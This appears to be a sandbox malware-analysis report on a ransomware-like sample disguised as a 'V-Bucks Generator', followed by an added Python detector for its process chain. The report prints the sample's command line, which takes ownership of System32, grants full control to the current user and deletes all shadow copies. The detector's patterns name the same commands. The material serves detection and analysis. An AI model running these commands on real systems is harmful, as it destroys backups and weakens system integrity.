Analysis
max time kernel: 15s
max time network: 16s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 14-08-2024 12:09
Static task: static1
Behavioral task behavioral1: sample V-Bucks Generator.exe, resource win7-20240704-en
Behavioral task behavioral2: sample V-Bucks Generator.exe, resource win10v2004-20240802-en
General
Target: V-Bucks Generator.exe
Size: 458KB
MD5: d5e63bc0a087c9cda1215688405b6fb2
SHA1: e32d08d66878bf50458cd8674dfc581a6fc611d4
SHA256: 9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666
SHA512: cdc9610af7562bca20bb29a14b7acb0facef90f15b21ad4d0006e5dc2afc9533cd406c7735dcc9c1e353cc04ff4b480d7d0229be59e2b0e51ed91bbef4298f12
SSDEEP: 12288:QGchrYmYRz1T/I/x/c/Qkrn5gA6IG+rQFR:SrqJT/Cw5gA6Iy
Malware Config
Signatures
Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Possible privilege escalation attempt (4 IoCs)
Processes:
  PID   Process
  2800  icacls.exe
  2852  takeown.exe
  2820  icacls.exe
  2844  takeown.exe

Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  PID   Process
  2844  takeown.exe
  2800  icacls.exe
  2852  takeown.exe
  2820  icacls.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Interacts with shadow copies (3 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  PID   Process
  2672  vssadmin.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
  Token                     PID   Process
  SeTakeOwnershipPrivilege  2844  takeown.exe
  SeTakeOwnershipPrivilege  2852  takeown.exe
  SeBackupPrivilege         2656  vssvc.exe
  SeRestorePrivilege        2656  vssvc.exe
  SeAuditPrivilege          2656  vssvc.exe

Suspicious use of WriteProcessMemory (18 IoCs)
Processes (the report records each parent/child pair three times, giving 18 entries for the 6 pairs below):
  Source PID  Source process          Target PID  Target process
  2972        V-Bucks Generator.exe   2684        cmd.exe        (3 entries)
  2684        cmd.exe                 2844        takeown.exe    (3 entries)
  2684        cmd.exe                 2800        icacls.exe     (3 entries)
  2684        cmd.exe                 2852        takeown.exe    (3 entries)
  2684        cmd.exe                 2820        icacls.exe     (3 entries)
  2684        cmd.exe                 2672        vssadmin.exe   (3 entries)

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe  (PID 2972)
  Command line: "C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 2684)
    Command line: "C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit
    - Suspicious use of WriteProcessMemory
    Note: the one-liner grants %username% full control; cmd.exe expands that variable before spawning icacls, which is why the child command lines below show Admin:F (the sandbox user) rather than %username%:F. Taking ownership of System32 and System32\drivers succeeds here only because the sample already runs as an administrator; SeTakeOwnershipPrivilege is enabled by takeown.exe on its own token (see the AdjustPrivilegeToken signature).

    C:\Windows\system32\takeown.exe  (PID 2844)
      Command line: takeown /f C:\Windows\System32
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe  (PID 2800)
      Command line: icacls C:\Windows\System32 /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\takeown.exe  (PID 2852)
      Command line: takeown /f C:\Windows\System32\drivers
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe  (PID 2820)
      Command line: icacls C:\Windows\System32\drivers /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\vssadmin.exe  (PID 2672)
      Command line: vssadmin delete shadows /all /quiet
      - Interacts with shadow copies

C:\Windows\system32\vssvc.exe  (PID 2656)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
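The process tree above is a compact chain: a dropped executable spawns cmd.exe, which takes ownership of System32, grants the current user full control, and wipes shadow copies. The following detection logic is an added example, not part of this sandbox report or of any product: it reads process-creation events of the kind Sysmon Event ID 1 or Security 4688 provide, tags each event with a technique, and groups the tags under the shell that spawned them so one alert names the root executable. The event tuples are constructed from the tree above plus two benign decoys; the tuple layout, the tag names and the alert thresholds are assumptions made for this example. It also classifies the segments of the cmd.exe /c one-liner itself, so the chain is caught even if the child events are lost, and it generalizes slightly beyond this report by accepting the wmic shadowcopy delete variant.

```python
"""Detect the takeown -> icacls -> vssadmin chain from process-creation events.

Added example, not part of the sandbox report. Event tuples are
(pid, ppid, image, command_line); the sample events below are constructed
from the report's process tree plus two benign decoys.
"""
import re
from collections import defaultdict

# Constructed sample: the chain from the report, then two benign decoys.
EVENTS = [
    (2972, 1000, r"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"'),
    (2684, 2972, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c color 47 && title Critical process '
     r'&& takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F '
     r'&& takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F '
     r'&& vssadmin delete shadows /all /quiet && Exit'),
    (2844, 2684, r"C:\Windows\system32\takeown.exe", r"takeown /f C:\Windows\System32"),
    (2800, 2684, r"C:\Windows\system32\icacls.exe", r"icacls C:\Windows\System32 /grant Admin:F"),
    (2852, 2684, r"C:\Windows\system32\takeown.exe", r"takeown /f C:\Windows\System32\drivers"),
    (2820, 2684, r"C:\Windows\system32\icacls.exe", r"icacls C:\Windows\System32\drivers /grant Admin:F"),
    (2672, 2684, r"C:\Windows\system32\vssadmin.exe", r"vssadmin delete shadows /all /quiet"),
    (3100, 900, r"C:\Windows\system32\vssadmin.exe", r"vssadmin list shadows"),
    (3101, 900, r"C:\Windows\system32\icacls.exe", r"icacls C:\Users\Admin\Documents\report.docx /grant Bob:R"),
]

SYSTEM_DIR = re.compile(r"^[a-z]:\\windows(\\|$)", re.I)   # anything under <drive>:\Windows
FULL_CONTROL = re.compile(r":\(?F\)?$", re.I)              # grantee:F or grantee:(F)


def tokens(cmdline):
    """Split a Windows command line, keeping quoted paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(image, cmdline):
    """Map one process-creation event to a technique tag, or None."""
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if not exe.endswith(".exe"):
        exe += ".exe"                      # bare 'takeown' inside a cmd one-liner
    toks = tokens(cmdline)
    low = [t.lower() for t in toks]
    if exe == "takeown.exe" and "/f" in low:
        i = low.index("/f") + 1
        if i < len(toks) and SYSTEM_DIR.match(toks[i]):
            return "takeown_system_dir"
    elif exe == "icacls.exe" and len(toks) > 1 and "/grant" in low:
        i = low.index("/grant") + 1
        # Match on the :F suffix only, so %username%:F (pre-expansion) and Admin:F both hit.
        if SYSTEM_DIR.match(toks[1]) and i < len(toks) and FULL_CONTROL.search(toks[i]):
            return "icacls_full_control_system_dir"
    elif exe == "vssadmin.exe" and "delete" in low and "shadows" in low:
        return "shadow_copy_delete"
    elif exe == "wmic.exe" and "shadowcopy" in low and "delete" in low:
        return "shadow_copy_delete"        # common variant; not seen in this report
    return None


def embedded_techniques(cmdline):
    """Classify each segment of a cmd.exe /c or /k one-liner (split on &, &&, |, ||)."""
    m = re.search(r"\s/[ck]\s+(.*)$", cmdline, re.I)
    if not m:
        return set()
    found = set()
    for segment in re.split(r"\s*(?:&&|\|\||&|\|)\s*", m.group(1)):
        seg = tokens(segment)
        if seg:
            tag = classify(seg[0], segment)
            if tag:
                found.add(tag)
    return found


def find_chains(events):
    """Group technique hits under the parent that spawned them and report chains.

    A parent is alerted on when it deletes shadow copies or combines at least two
    tags; the record names the root ancestor so the alert points at the dropper."""
    by_pid = {e[0]: e for e in events}
    evidence = defaultdict(list)           # parent pid -> [(tag, pid, source)]
    for pid, ppid, image, cmdline in events:
        tag = classify(image, cmdline)
        if tag:
            evidence[ppid].append((tag, pid, "child_process"))
        if image.lower().endswith("\\cmd.exe"):
            # The /c one-liner carries the whole chain before any child has run.
            for tag in embedded_techniques(cmdline):
                evidence[pid].append((tag, pid, "command_line"))
    alerts = []
    for ppid, ev in evidence.items():
        techniques = {t for t, _, _ in ev}
        if "shadow_copy_delete" not in techniques and len(techniques) < 2:
            continue
        root = ppid
        while root in by_pid and by_pid[root][1] in by_pid:
            root = by_pid[root][1]
        alerts.append({
            "shell_pid": ppid,
            "root_pid": root,
            "root_image": by_pid[root][2] if root in by_pid else None,
            "techniques": techniques,
            "evidence": sorted(ev),
        })
    return alerts


if __name__ == "__main__":
    for a in find_chains(EVENTS):
        print(a["root_image"], "-> shell", a["shell_pid"], sorted(a["techniques"]))
```

Run against the constructed events it raises a single alert rooted at PID 2972 (the V-Bucks executable) with all three tags, while the decoys (vssadmin list shadows, an icacls grant on a user document) produce nothing. Matching the :F suffix rather than a specific grantee is deliberate: the cmd.exe command line shows %username%:F, the icacls children show Admin:F, and a rule keyed on the account name would miss one of the two.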